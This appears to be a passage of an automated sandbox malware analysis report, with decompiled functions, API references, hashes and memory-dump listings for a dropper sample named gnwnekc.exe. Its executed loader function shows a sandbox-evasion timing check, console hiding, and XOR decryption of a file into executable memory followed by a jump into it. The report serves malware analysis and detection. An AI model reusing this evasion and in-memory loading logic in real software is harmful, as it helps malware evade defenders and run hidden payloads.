					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32 ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406544
0x00406546
0x0040655b
0x0040655e
0x00406563
0x00406568
0x004065a6
0x004065a6
0x0040656a
0x0040657c
0x00406587
0x0040658d
0x00406598
0x00000000
0x00000000
0x00406598
0x004065ac

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230), ref: 0040657C
RegCloseKey.ADVAPI32(?), ref: 00406587

Strings

('B, xrefs: 0040655B
"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v, xrefs: 0040653D

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CloseQueryValue
String ID: "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v$('B
API String ID: 3356406503-658096923
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f38
0x00405f45
0x00405f46
0x00405f51
0x00405f59
0x00405f59
0x00405f61

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
CharPrevW.USER32(?,00000000), ref: 00405F47
lstrcatW.KERNEL32 ref: 00405F59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}

0x00405642
0x0040564c
0x00405668
0x0040568a
0x0040568d
0x00405693
0x0040569d
0x0040569e
0x004056a0
0x004056a6
0x004056a6
0x004056b0
0x00000000
0x004056be
0x00405675
0x004056ad
0x004056ad
0x00000000
0x004056ad
0x00405681
0x00405683
0x00000000
0x00405683
0x00405652
0x00000000
0x00000000
0x00405659
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060cd
0x004060cf
0x004060d2
0x004060fe
0x004060d7
0x004060e0
0x004060e5
0x004060f0
0x004060f3
0x0040610f
0x004060f5
0x004060fc
0x00000000
0x004060fc
0x00406108
0x0040610c
0x0040610c
0x00406106
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
CharNextA.USER32(00000000), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: gnwnekc.exePID: 508, Parent PID: 1968COMMON

Execution Graph

Execution Coverage:	18.3%
Dynamic/Decrypted Code Coverage:	6.3%
Signature Coverage:	3%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 00401000 Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 177
sleepprocessmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00401000(struct HWND__* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t39;
				long _t40;
				void* _t42;
				short* _t45;
				void* _t48;
				long _t53;
				int _t54;
				void* _t60;
				long _t62;
				void* _t64;
				signed int _t74;
				signed char* _t75;
				signed int _t81;
				void* _t82;
				int _t88;
				WCHAR* _t89;
				char* _t91;
				void* _t93;
				WCHAR* _t94;
				long _t96;
				void* _t97;
				void** _t98;
				void** _t99;
				WCHAR** _t100;
				void** _t104;

				_t97 = _t98[0xa1];
				 *_t98 = 0; // executed
				__imp__GetConsoleWindow(); // executed
				ShowWindow(__eax, 0); // executed
				_t39 = GetTickCount();
				_t92 = _t39;
				Sleep(0x2be); // executed
				_t40 = GetTickCount();
				_t105 = _t40 - _t39 - 0x2bc;
				if(_t40 - _t39 < 0x2bc) {
					_t42 = GetCurrentProcess();
					__imp__IsWow64Process(_t42,  &(_t98[2]));
					if(_t42 == 0 || _t98[2] == 0) {
						_t93 = _t98[0xa0];
						if(_t93 < 2) {
							L17:
							return 1;
						}
						_t74 = 1;
						_t88 = 0;
						do {
							_t45 =  *((intOrPtr*)(_t97 + _t74 * 4));
							if( *_t45 != 0x2f) {
								__eflags = _t88;
								_t88 =  ==  ? _t45 : _t88;
							} else {
								_t48 = E00404211(_t45, L"/norestart");
								_t98 =  &(_t98[2]);
								if(_t48 != 0) {
									E00404211( *((intOrPtr*)(_t97 + _t74 * 4)), L"/quiet");
									_t98 =  &(_t98[2]);
								}
							}
							_t74 = 1 + _t74;
						} while (_t93 != _t74);
						if(_t88 != 0) {
							__imp__CoInitialize(0);
							GetTempPathW(0xff,  &(_t98[0x19]));
						}
						goto L17;
					} else {
						_t98[1] = 1;
						asm("xorps xmm0, xmm0");
						_t94 =  &(_t98[8]);
						asm("movups [esi+0x4], xmm0");
						asm("movups [esi+0x14], xmm0");
						asm("movups [esi+0x24], xmm0");
						asm("movups [esi+0x34], xmm0");
						 *_t94 = 0x44;
						_t89 =  &(_t98[0x19]);
						GetSystemDirectoryW(_t89, 0x104);
						E004041E0(_t89, L"\\wusa.exe");
						_t99 =  &(_t98[2]);
						__imp__Wow64DisableWow64FsRedirection();
						_t53 = GetCommandLineW();
						_t100 = _t99 - 0x28;
						_t100[9] =  &(_t100[0xe]);
						_t100[8] = _t94;
						_t100[7] = 0;
						_t100[6] = 0;
						asm("xorps xmm0, xmm0");
						asm("movups [esp+0x8], xmm0");
						_t100[1] = _t53;
						 *_t100 = _t89;
						_t54 = CreateProcessW( &(_t99[3]), ??, ??, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t54;
						if(_t54 != 0) {
							WaitForSingleObject(_t100[5], 0xffffffff);
							GetExitCodeProcess(_t100[5],  &(_t100[1]));
							CloseHandle(_t100[4]);
							CloseHandle(_t100[5]);
						}
						__imp__Wow64RevertWow64FsRedirection(_t100[3]);
						ExitProcess(_t100[1]);
					}
				}
				_t60 = E004034D3( *((intOrPtr*)(_t97 + 4)), L"rb"); // executed
				_t90 = _t60;
				E004038C1(_t82, _t60, 0, 2); // executed
				_t62 = E00403B98(0, _t82, _t60, _t92, _t105, _t60); // executed
				_t96 = _t62;
				E004038C1(_t82, _t60, 0, 0); // executed
				_t104 =  &(_t98[9]);
				_t64 = VirtualAlloc(0, _t96, 0x3000, 0x40); // executed
				_t75 = _t64;
				 *_t104 = _t64;
				E004036BE(_t64, _t96, 1, _t90); // executed
				_t98 =  &(_t104[4]);
				if(_t96 == 0) {
					L5:
					goto __eax;
				}
				 *_t75 =  *_t75 ^ 0x00000032;
				if(_t96 != 1) {
					_t81 = 1;
					_t91 = "48058040134";
					do {
						 *( *_t98 + _t81) =  *( *_t98 + _t81) ^ _t91[ ~((_t81 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) + (_t81 * 0xaaaaaaab >> 0x00000020 >> 0x00000001 & 0xfffffffc) * 2)];
						_t81 = 1 + _t81;
						_t91 =  &(_t91[1]);
					} while (_t96 != _t81);
				}
			}

0x0040100a
0x00401013
0x00401016
0x0040101e
0x0040102a
0x0040102c
0x00401033
0x00401039
0x0040103d
0x00401042
0x004010d8
0x004010e4
0x004010ec
0x004010f5
0x004010ff
0x0040115b
0x00401168
0x00401168
0x00401103
0x00401104
0x00401106
0x00401106
0x0040110e
0x00401135
0x00401137
0x00401110
0x00401116
0x0040111b
0x00401120
0x0040112b
0x00401130
0x00401130
0x00401120
0x0040113a
0x0040113b
0x00401141
0x00401145
0x00401155
0x00401155
0x00000000
0x00401169
0x00401169
0x00401171
0x00401174
0x00401178
0x0040117c
0x00401180
0x00401184
0x00401188
0x0040118e
0x00401198
0x004011a4
0x004011a9
0x004011b1
0x004011b7
0x004011bd
0x004011c4
0x004011c8
0x004011ce
0x004011d2
0x004011d6
0x004011d9
0x004011de
0x004011e2
0x004011e5
0x004011eb
0x004011ed
0x004011f5
0x00401204
0x00401214
0x0040121a
0x0040121a
0x00401220
0x0040122a
0x0040122a
0x004010ec
0x00401050
0x00401058
0x0040105e
0x00401067
0x0040106f
0x00401074
0x00401079
0x00401085
0x0040108b
0x0040108d
0x00401095
0x0040109a
0x0040109f
0x004010d3
0x004010d6
0x004010d6
0x004010a1
0x004010a7
0x004010ab
0x004010ac
0x004010b6
0x004010ca
0x004010cd
0x004010ce
0x004010cf
0x004010b6

APIs

GetConsoleWindow.KERNEL32 ref: 00401016
ShowWindow.USER32(00000000,00000000), ref: 0040101E
GetTickCount.KERNEL32 ref: 0040102A
Sleep.KERNELBASE(000002BE), ref: 00401033
GetTickCount.KERNEL32 ref: 00401039
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401085
__fread_nolock.LIBCMT ref: 00401095
GetCurrentProcess.KERNEL32 ref: 004010D8
